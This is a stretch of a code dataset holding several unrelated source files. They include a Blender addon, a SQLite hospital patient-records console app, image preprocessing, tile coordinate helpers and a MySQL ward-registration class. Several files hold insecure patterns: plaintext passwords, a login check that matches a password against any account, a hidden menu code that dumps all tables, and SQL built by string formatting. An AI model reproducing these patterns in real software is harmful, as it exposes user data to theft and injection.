vg_weight_previous\n\nclass OT_BALANCE_VG(bpy.types.Operator):\n \"\"\"Balance the weight of two vertex groups\"\"\"\n bl_idname = \"object.vertex_group_balance\"\n bl_label = \"Balance\"\n\n @classmethod\n def poll(cls, context):\n return context.active_object is not None\n\n def execute(self, context):\n main(context)\n return {'FINISHED'}\n\ndef add_vertex_group_tools(self, context):\n\n layout = self.layout\n\n ob = context.object\n\n if ob.vertex_groups and ob.mode == 'EDIT':\n\n row = layout.row()\n row.operator(\"object.vertex_group_balance\")\n row.prop_search(context.scene, \"vgai2\", context.active_object, \"vertex_groups\", text=\"\")\n\ndef register():\n bpy.utils.register_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.append(add_vertex_group_tools)\n\ndef unregister():\n bpy.utils.unregister_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.remove(add_vertex_group_tools)\n\nif __name__ == \"__main__\":\n register()\n\n","sub_path":"scripts/addons_extern/metatool_addon/vert_balance_vertex_groups.py","file_name":"vert_balance_vertex_groups.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"279260672","text":"import os\nimport logging\n\nos.chdir(r'G:\\cnx\\projects\\udacity\\Self-Driving Cars\\1 - Computer Vision, Deep Learning and Sensor\\Project 3 - Traffic Sign Classifier\\local')\n\nimport Display\n\nFORMAT = '%(module)-15s:%(levelname)-5s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.DEBUG)\nlogging.getLogger(\"display\").setLevel(logging.DEBUG)\n\nlogging.info(\"Main file\")\nlogging.debug(\"Test\")\n\ninput = r'G:/cnx/projects/udacity/Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 2 - Advanced Lane Finding/test_images'\noutput = r'G:/test/'\na = Display.Image(input, output)\na.run()\n","sub_path":"Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 3 - Traffic Sign Classifier/local/display_test.py","file_name":"display_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"498384341","text":"import getpass\r\nimport sqlite3\r\nconnection=sqlite3.connect('hospital.db')\r\ncursor=connection.cursor()\r\nerror=1\r\nfrom os import system, name\r\ndef screen_clear():\r\n if name == 'nt':\r\n _ = system('cls')\r\n else:\r\n _ = system('clear')\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='doctor'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE doctor ( \r\n d_id number primary key, \r\n dnamedfirst VARCHAR2(20), \r\n dnamedlast VARCHAR2(30), \r\n password varchar2(20) not null,\r\n speciality varchar2(40) not null,\r\n shift varchar2(10) not null,\r\n phone number(10) not null);\"\"\")\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='patient'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE patient ( \r\n p_id number primary key, \r\n pfirst VARCHAR2(20), \r\n pdlast VARCHAR2(30), \r\n City varchar2(20) not null,\r\n DOB date not null,\r\n age number not null,\r\n DOA date not null,\r\n number number(10) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE virus ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n vname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE bacteria ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n bname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE injury ( \r\n p_id number not null, \r\n iname VARCHAR2(20) primary key,\r\n idiagnosis VARCHAR2(50), \r\n type varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(101,'Mohit','Nayak','Bangalore','15-March-2001',18,'08-March-2020',9078435952)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(102,'Anikiat','Saraf','Kolkata','22-Dec-2000','19','15-Feb-2020',9674825476)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(103,'Rishank','Pratik','Orissa','22-Dec-2001','18','19-Nov-2015',9117854569)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(104,'Risav','Jana','Nepal','06-Jan-2001',18,'25-Oct-2010',7854963284)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(105,'Wilson','Vidyut','Mumbai','23-Nov-2001',18,'23-Nov-2005',7854129645)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(106,'Dinesh','Sharma','Rajasthan','23-Feb-2000',20,'23-Feb-2000',8476423858)\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(103,'Ebola','Ebov','Oxygen Therapy, IV Fluids','Muscle Pain, Fever, Bleeding')\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(105,'Measles','Paramyxo','Vitamin A','Cough, Skin Rash')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(101,'TB','Mycobacterium','Antibiotics','Cough and Sneezes')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(106,'Cholera','Vibrio','IV Fluids, Antibiotics','Seizures, Diarrhoea')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(102,'Hair line Fracture','Plaster, Pain Killer','Toe Fracture')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(104,'bullet wound','Removal of Bullet','Wound')\"\"\")\r\n print(\"Databse created successfully\")\r\n \r\nelse:\r\n e=1\r\n while e!=0:\r\n e=int(input(\"1. Sign In\\n2. Create a New Doctor Account\\n\"))\r\n if e==2:\r\n did=int(input('\\nEnter id - '))\r\n dnf=input('Enter first name - ')\r\n dnl=input('Enter last name - ')\r\n pas=getpass.getpass('Enter password - ')\r\n spec=input('Enter speciality - ')\r\n shf=input('Enter working shift - ')\r\n ph=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into doctor values(?,?,?,?,?,?,?)\"\"\",(did,dnf,dnl,pas,spec,shf,ph))\r\n screen_clear()\r\n e=1\r\n elif e==1:\r\n while error==1:\r\n i=input(\"\\nEnter your ID - \")\r\n p=getpass.getpass(\"Enter your Password - \")\r\n cursor.execute(\"\"\"select count(d_id) from doctor where d_id=(?)\"\"\",(i,))\r\n if cursor.fetchone()[0]==1:\r\n cursor.execute(\"\"\"select count(password) from doctor where password=?\"\"\",(p,))\r\n if cursor.fetchone()[0]==1:\r\n print(\"\\nSign in successful!\")\r\n screen_clear()\r\n error=0\r\n e=0\r\n r=1\r\n cursor.execute(\"\"\"select d_id,dnamedfirst,dnamedlast,speciality,shift,phone from doctor where d_id=(?)\"\"\",(i,))\r\n for row in cursor.fetchall():\r\n print(\"ID -\",row[0],\" Name -\",row[1], row[2],\" Speciality -\",row[3],\"\\nShift -\",row[4],\" Phone Number -\",row[5])\r\n while r!=0:\r\n print(\"\\n1. View Patient details\\n2. Add a New Patient\\n3. Delete Patient Details\\n0. Exit\")\r\n r=int(input())\r\n if r==1:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from patient where p_id=(?)\"\"\",(access,))\r\n print(\"\\nPatient Details - \")\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"First Name: \", row[1])\r\n print(\"Last Name: \", row[2])\r\n print(\"City: \", row[3])\r\n print(\"Date of Birth: \", row[4])\r\n print(\"Age: \", row[5])\r\n print(\"Date of Admission: \", row[6])\r\n print(\"\\nDiagnosis Report - \")\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from virus where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Virus Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from bacteria where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Bacteria Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from injury where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Injury Name: \", row[1])\r\n print(\"Diagnosis Name: \", row[2])\r\n print(\"Type: \", row[3])\r\n print(\"\\n\")\r\n else:\r\n print(\"Incorrect Patient id\")\r\n elif r==2:\r\n pid=int(input('\\nEnter id - '))\r\n pnf=input('Enter first name - ')\r\n pnl=input('Enter last name - ')\r\n pcity=input('Enter city - ')\r\n pdob=input('Enter date of birth - ')\r\n page=int(input('Enter age - '))\r\n pdoa=input('Enter date of admission - ')\r\n pnum=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into patient values(?,?,?,?,?,?,?,?)\"\"\",(pid,pnf,pnl,pcity,pdob,page,pdoa,pnum))\r\n print(\"\\n1. Virus\\n2. Bacteria\\n3. Injury\")\r\n m=int(input())\r\n if m==1:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter virus name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into virus values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==2:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter bacteria name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into bacteria values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==3:\r\n iname=input(\"\\nEnter injury name - \")\r\n idiag=input(\"Enter diagnosis - \")\r\n itype=input(\"Enter injury type - \")\r\n cursor.execute(\"\"\"insert into injury values(?,?,?,?)\"\"\",(pid,iname,idiag,itype))\r\n print(\"\\nPatient Added\")\r\n connection.commit()\r\n elif r==3:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from patient where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from virus where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from bacteria where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from injury where p_id=(?)\"\"\",(access,))\r\n else:\r\n print(\"Incorrect Patient id Patient does not exist\")\r\n print(\"\\nPatient Deleted\")\r\n connection.commit()\r\n elif r==0:\r\n break\r\n else:\r\n print(\"Incorrect passoword. Please retry \")\r\n else:\r\n print(\"Incorrect User ID. Please retry \")\r\n break\r\n elif e==2212:\r\n cursor.execute(\"\"\"select * from doctor\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from virus\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from bacteria\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from injury\"\"\")\r\n print(cursor.fetchall())\r\n break\r\nconnection.commit()\r\nconnection.close()\r\nprint(\"\")\r\ndef progress(status, remaining, total):\r\n print(f'Copied {total-remaining} of {total} pages...')\r\n\r\ntry:\r\n sqliteCon = sqlite3.connect('hospital.db')\r\n backupCon = sqlite3.connect('hospital_backup.db')\r\n with backupCon:\r\n sqliteCon.backup(backupCon, pages=1, progress=progress)\r\n print(\"backup successful\")\r\nexcept sqlite3.Error as error:\r\n print(\"Error while taking backup: \", error)\r\nfinally:\r\n if(backupCon):\r\n backupCon.close()\r\n sqliteCon.close()\r\n","sub_path":"Doctor.py","file_name":"Doctor.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"413373878","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plot\nimport os\nimport json\nimport copy\nimport time\nimport shutil\nfrom dataUtils import shutildata\n\n\ndef cut(img):\n # img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 17, 6)\n img = copy.deepcopy(img)\n img = np.asarray(img)\n img[img > 127] = 255\n img[img <= 127] = 1\n img[img == 255] = 0\n\n cols = np.sum(img, 0)\n rows = np.sum(img, 1)\n # print(cols)\n\n x1 = 0\n y1 = 0\n y2, x2 = img.shape\n y2 -= 1\n x2 -= 1\n\n for i in range(len(cols)):\n if cols[i] > 0:\n x1 = i\n break\n\n for i in range(len(cols)):\n if cols[len(cols) - 1 - i] > 0:\n x2 = len(cols) - 1 - i\n break\n\n for i in range(len(rows)):\n if rows[i] > 0:\n y1 = i\n break\n\n for i in range(len(rows)):\n if rows[len(rows) - 1 - i] > 0:\n y2 = len(rows) - 1 - i\n break\n\n return x1, x2, y1, y2\n\n\ndef resize(img):\n width, height = img.shape\n if width > height:\n wider = (width - height) // 2\n img=cv2.copyMakeBorder(img,0,0,wider,wider,cv2.BORDER_CONSTANT, value=[255, 255, 255])\n\n elif height>width:\n wider=(height - width)//2\n img=cv2.copyMakeBorder(img, wider, wider,0,0, cv2.BORDER_CONSTANT, value=[255, 255, 255])\n return img\n\n# a-z\ndef makeOringinData(path):\n datapath=\"E:\\\\PythonProject\\\\CNN_Pinyin/Data/originData/\"\n if os.path.exists(datapath):\n shutil.rmtree(datapath)\n\n os.mkdir(datapath)\n\n with open('num_char.json', 'r') as f:\n dict = json.loads(f.read())\n\n for i in os.listdir(path):\n char = i\n pre_name=dict[str(char)]+'_'\n print(pre_name)\n imgPath = path + char + '/'\n count = 0\n savaPath = datapath+ char + '/'\n print(savaPath)\n\n dirlist=os.listdir(imgPath)\n if len(dirlist) == 0:\n continue\n\n if os.path.exists(savaPath):\n shutil.rmtree(savaPath)\n\n if not os.path.exists(savaPath):\n os.mkdir(savaPath)\n\n for i in dirlist:\n img = cv2.imread(imgPath + i, 0)\n temp=img\n print(i)\n try:\n width,height=img.shape\n except:\n continue\n if not width==height:\n x1, x2, y1, y2 = cut(img)\n if x1 == x2 or y1 == y2:\n continue\n print(x1, x2, y1, y2)\n temp = img[y1:y2, x1:x2]\n temp=resize(temp)\n temp = cv2.resize(temp, (28, 28))\n\n cv2.imwrite(savaPath + pre_name + str(count) + '.jpg', temp)\n count += 1\n\n\nif __name__ == '__main__':\n\n path = 'C:\\\\Users\\\\MarkXu\\\\Desktop\\\\dst\\\\chars/'\n makeOringinData(path)\n shutildata('Data/originData/', 'Data/train/', 'Data/test/')\n\n\n\n","sub_path":"MakeData.py","file_name":"MakeData.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"607256855","text":"import numpy as np\nimport mercantile as m\n\ndef single_point(row,bound,deltax,deltay):\n\tfactorx = (row[0] - bound.west) / deltax\n\tfactory = (bound.north - row[1]) / deltay\n\n\txval = int(factorx * 4096)\n\tyval = int(factory * 4096)\n\n\treturn [xval,yval]\n\ndef get_convert_values(key):\n\tz,x,y = str.split(key,'/')[1:]\n\n\tbound = m.bounds(m.Tile(int(x), int(y), int(z)))\n\tdeltax,deltay = (bound.east - bound.west),(bound.north - bound.south)\n\n\treturn bound,deltax,deltay\n\n\ndef convert_all(key,coordss):\n\t#newlist = []\n\tbound,deltax,deltay = get_convert_values(key)\n\t#for coords in coordss:\n\treturn [[single_point(i,bound,deltax,deltay) for i in coords] for coords in coordss]\n\t#return newlist\n","sub_path":"python_vtile/coords.py","file_name":"coords.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"579115373","text":"from setuptools import setup\n\nMAJOR = 0\nMINOR = 1\nRELEASE = 5\n\nsetup(\n name=\"Thalassa\",\n version=\"%s.%s.%s\" % (MAJOR, MINOR, RELEASE),\n description=\"TBD\",\n url=\"https://github.com/Arrekin/Thalassa\",\n author=\"Daniel Misior\",\n packages=[\n \"thalassa\",\n \"thalassa.database\",\n ],\n install_requires=[\n \"Twisted\",\n \"sqlalchemy\",\n \"greenstalk\"\n ],\n)\n","sub_path":"ThalassaCore/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"395824898","text":"# import speech_recognition as sr\nimport os\n# from gtts import gTTS\nimport warnings\nimport calendar\nimport random\nimport wikipedia\nimport datetime\n# from playsound import playsound\nimport pytz\nimport autocorrect\n\n\n# ignoring warnings\nwarnings.filterwarnings('ignore')\n\nspell = autocorrect.Speller(lang='en')\n\n# # recording audio and return it as a string\n# def record_audio():\n\n# # record audio\n# r = sr.Recognizer() # Recognizer object\n\n# # opening mic to record\n# with sr.Microphone() as source:\n# print('Say Something')\n# audio = r.listen(source)\n\n# data = \"\"\n# try:\n# data = r.recognize_google(audio)\n# print(data)\n# except sr.UnknownValueError: # check for unknown errors\n# return ('Speech not recognised')\n# except sr.RequestError:\n# return ('You got disconnected, please try again !')\n\n# return data\n\n# # function to convert text to speech\n# def assistant_response(text):\n# if text == \"\":\n# text = \"Sorry\"\n# t_t_s = gTTS(text=text, lang = 'en', slow = False)\n\n# # getting current path\n# current_path = os.path.realpath(__file__)\n# # saving audio\n# t_t_s.save(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n# playsound(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n\n\n# check it to wake up\ndef wake_up(text):\n wake_words = [\"hey buddy\",\"hi buddy\",\"hello buddy\",\"listen buddy\"]\n for word in wake_words:\n if word in text.lower():\n return True\n\n return False\n\n# get date\ndef getDate():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n my_date = datetime.datetime.today()\n weekday = calendar.day_name[my_date.weekday()]\n month = now.strftime(\"%B\")\n\n date_today = now.strftime(\"%d\")\n\n if date_today == '1':\n date_today += 'st'\n elif date_today == '2':\n date_today += 'nd'\n elif date_today == '3':\n date_today += 'rd'\n else:\n date_today += 'th'\n\n return f\"Today is {weekday} ,{month} {(date_today)} {now.year}\"\n\n# get time\ndef getTime():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n hr = now.hour\n minute = now.minute\n mer = \"a.m.\"\n\n if hr >= 12:\n mer = 'p.m.'\n hr = int(hr) - 12\n \n\n return f\"Its {hr} : {minute} {mer}\"\n\n# greetings\ndef greeting(text):\n\n # user inputs\n greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n # buddy response\n my_greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef end_conv(text):\n\n # user inputs\n greets = ['bye','see you','goodbye','good bye','exit','leave','go','tata','see ya']\n\n # buddy response\n my_greets = ['bye','see you later',\"see you soon\",\"your are really cool\",\"will talk to you later\",\"byeee\",'goodbye','good bye','tata','see ya']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef getName(text):\n wordList = text.split()\n return text\n for i in range(len(wordList)):\n if i+3 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2] + ' ' + wordList[i+3]\n elif i+2 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2]\n\ndef spell_check(word_list):\n # checked_list = []\n for i in range(len(word_list)):\n word_list[i] = spell(word_list[i])\n return \" \".join(word_list)\n\n# search for keywords\n# def wiki_search(text):\n\n\ndef get_emoji():\n\n # user inputs\n my_icons=[ \"😀\", \"😃\", \"😄\", \"😁\", \"😆\", \"😅\", \"😂\", \"🤣\", \"☺️\", \"😊\", \"😇\", \"🙂\", \"🙃\", \"😉\", \"😌\", \"😍\", \"🥰\", \"😘\", \"😗\", \"😙\", \"😚\", \"😋\", \"😛\", \"😝\", \"😜\", \"🤪\", \"🤨\", \"🧐\", \"🤓\", \"😎\", \"🤩\", \"🥳\", \"😏\", \"😒\", \"😞\", \"😔\", \"😟\", \"😕\", \"🙁\", \"☹️\", \"😣\", \"😖\", \"😫\", \"😩\", \"🥺\", \"😢\", \"😭\", \"😤\", \"😠\", \"😡\", \"🤬\", \"🤯\", \"😳\", \"🥵\", \"🥶\", \"😱\", \"😨\", \"😰\", \"😥\", \"😓\", \"🤗\", \"🤔\", \"🤭\", \"🤫\", \"🤥\", \"😶\", \"😐\", \"😑\", \"😬\", \"🙄\", \"😯\", \"😦\", \"😧\", \"😮\", \"😲\", \"🥱\", \"😴\", \"🤤\", \"😪\", \"😵\", \"🤐\", \"🥴\", \"🤢\", \"🤮\", \"🤧\", \"😷\", \"🤒\", \"🤕\", \"🤑\", \"🤠\", \"😈\", \"👿\", \"👹\", \"👺\", \"🤡\", \"💩\", \"👻\", \"💀\", \"☠️\", \"👽\", \"👾\", \"🤖\", \"🎃\", \"😺\", \"😸\", \"😹\", \"😻\", \"😼\", \"😽\", \"🙀\", \"😿\", \"😾\" ]\n \n\n return random.choice(my_icons)\n\n\n\n\n ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584855251","text":"from __future__ import print_function, division\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom game2048.game import Game\nfrom game2048.displays import Display\n\n\nclass myDataset(Dataset):\n\n def __init__(self):\n self.board = []\n self.direction = []\n\n def add(self, getboard, getdirection):\n self.board.append(getboard)\n self.direction.append(getdirection)\n\n def __len__(self):\n return len(self.board)\n\n def __getitem__(self, idx):\n myBoard = self.board[idx]\n myDirection = self.direction[idx]\n return myBoard, myDirection\n\n\ndef single_run(size, ds, AgentClass, **kwargs):\n game = Game(size, 2048)\n agent = AgentClass(game, display=Display(), **kwargs)\n agent.play(dataset=ds, verbose=False, train=1)\n\n\nif __name__ == '__main__':\n GAME_SIZE = 4\n N_TESTS = 1000\n\n '''====================\n Use your own agent here.'''\n from game2048.agents import ExpectiMaxAgent as TestAgent\n '''===================='''\n\n scores = []\n dataset = myDataset()\n for _ in range(N_TESTS):\n\n single_run(GAME_SIZE, ds=dataset, AgentClass=TestAgent)\n np.save(\"b16\", dataset.board)\n np.save(\"d16\", dataset.direction)\n print(len(dataset))\n\n","sub_path":"2048/game2048/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"34750387","text":"import mysql.connector\nimport pickle\n\nwith open(\"ward.pickle\",\"rb\") as picklefile:\n database_name=pickle.load(picklefile)['id']\nprint(database_name)\n\nclass database:\n def __init__(self,hostname,user,dbase,pword=\"\"):\n try:\n self.mydb=mysql.connector.connect(\n host=hostname,\n user=user,\n password=pword,\n )\n except Exception as e:\n print(\"Not Connected to database.\")\n print(e)\n\n def insertintowadatable(self,name,address,about):\n #INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES('1','A','B','2','sgjkf','8935734','C','576','231','123')\n mycursor=self.mydb.cursor()\n sql=\"INSERT INTO wada(wada_name,wada_address,wada_info) VALUES (%s,%s,%s)\"\n val=(name,address,about) \n mycursor.execute(sql,val) \n self.mydb.commit()\n print(\"insert successful.\")\n mycursor.close()\n\nclass database_signinwindow(database):\n def __init__(self,hostname,user,dbase,pword=\"\"):\n super().__init__(hostname,user,dbase,pword)\n self.mycursor=self.mydb.cursor()\n\n def createWardTable(self):\n try:\n #\"CREATE TABLE `departments` (\"\" `dept_no` char(4) NOT NULL,\"\" `dept_name` varchar(40) NOT NULL,\"\" PRIMARY KEY (`dept_no`), UNIQUE KEY `dept_name` (`dept_name`)\"\") ENGINE=InnoDB\"\n sql=\"CREATE TABLE `smartward`.`ward_registration` ( `ID` VARCHAR(30) NOT NULL , `Municipality` VARCHAR(75) NOT NULL , `WardNo` VARCHAR(5) NOT NULL , `State` VARCHAR(5) NOT NULL , `Address` VARCHAR(150) NOT NULL , `Phone` VARCHAR(15) NOT NULL , `Email` VARCHAR(50) NOT NULL , `IP_Address` VARCHAR(15) NOT NULL , `LogoPath` VARCHAR(150) NOT NULL , `Password` VARCHAR(16) NOT NULL , PRIMARY KEY (`ID`)) ENGINE = InnoDB\"\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"table created.\")\n self.mycursor.close()\n except Exception as e:\n print(\"table already exists\")\n\n def checkValid(self,municipality,ward):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Municipality=%s AND WardNo=%s\"\n self.mycursor.execute(sql,(municipality,ward))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def checkEmailValid(self,email):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql,(email,))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def InsertIntoward_registrationTable(self,id,municipality,wardno,state,address,phone,email,ip,logopath,pword):\n try:\n sql=\"INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n val=(id,municipality,wardno,state,address,phone,email,ip,logopath,pword)\n self.mycursor.execute(sql,val)\n self.mydb.commit()\n self.mycursor.close()\n return True\n except Exception:\n print(\"insert failed\")\n return False\n\n def checkLoginValidity(self,id,pswd):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql, (id,id))\n login_details=self.mycursor.fetchall()\n if(login_details):\n if(pswd==login_details[0][-1]):\n return login_details[0][-3],login_details[0][-4],login_details[0][0]\n return \"invalid\",\"\",\"\"\n\n def checkEmailValidity(self,email):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql, (email,))\n return self.mycursor.fetchall()\n\n def updateIP(self,id,ip):\n try:\n sql=\"UPDATE `smartward`.`ward_registration` SET IP_Address=%s WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql,(ip,id,id))\n self.mydb.commit()\n self.mycursor.close()\n except Exception:\n print(\"Ip update unsucessful\")\n\n def createDatabase(self):\n self.mycursor.execute(\"CREATE DATABASE 3hu4\")\n self.mydb.commit()\n self.mycursor.close()\n\nclass database_wardwindow(database):\n def __init__(self,hostname,user,dbase=database_name,pword=\"\"):\n super().__init__(hostname, user, dbase, pword)\n self.mycursor = self.mydb.cursor()\n try:\n self.mycursor.execute(\"CREATE DATABASE {0}\".format(dbase))\n self.mydb.commit()\n except Exception:\n pass\n self.mycursor.execute(\"USE {0}\".format(dbase))\n self.mydb.commit()\n\n\n def createFormTable(self,tablename):\n try:\n sql=\"CREATE TABLE {0} (RegDate VARCHAR(10) NOT NULL,RegNo VARCHAR(15) NOT NULL, PRIMARY KEY(RegNo)) ENGINE=InnoDB\".format(tablename)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception as e:\n print(e)\n return\n\n def addColumns(self,tablename,*columns):\n try:\n for column in columns:\n sql=\"ALTER TABLE {0} ADD COLUMN {1} VARCHAR(1600)\".format(tablename,column)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception:\n return\n\n def insertValues(self,tablename,columnandvaluselist):\n csv=columnandvaluselist\n print(csv)\n sql=\"INSERT INTO {0} ({1},{2}) VALUES ('{3}','{4}')\".format(tablename,csv[0],csv[2],csv[1],csv[3])\n self.mycursor.execute(sql)\n self.mydb.commit()\n for i in range(4,len(csv),2):\n sql=\"UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'\".format(tablename,csv[i],csv[i+1],csv[0],csv[1])\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"Ok\")\n\n def getRowCount(self,column,tablename,value):\n sql = \"SELECT {0} FROM {1} WHERE {0} LIKE '{2}'\".format(column,tablename,value)\n self.mycursor.execute(sql)\n rows=self.mycursor.fetchall()\n if(rows):\n return len(rows)\n return 